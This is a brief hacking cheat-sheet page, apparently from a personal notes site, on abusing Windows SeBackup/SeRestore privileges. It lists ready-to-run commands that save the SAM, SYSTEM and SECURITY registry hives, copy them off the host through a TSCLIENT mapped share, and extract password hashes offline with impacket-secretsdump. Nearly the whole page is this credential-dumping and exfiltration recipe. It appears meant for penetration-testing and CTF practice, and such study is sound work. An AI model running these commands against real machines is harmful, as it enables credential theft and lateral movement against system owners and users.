>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Active Directory / SeBackup/SeRestore - SAM and System Hive Dump

SeBackup/SeRestore - SAM and System Hive Dump

Active Directory AD Attacks windows

Save the hives (only local accounts, but no special tools needed)

cd c:\
mkdir temp
cd temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

Copy them out via TSCLIENT mapped drive

copy sam,system \\TSCLIENT\share\

Offline extraction

impacket-secretsdump -sam sam -system system local

Full hive set including SECURITY (more credential material)

reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save

Reference

https://infosecwriteups.com/razorblack-walkthrough-thm-fde0790c182f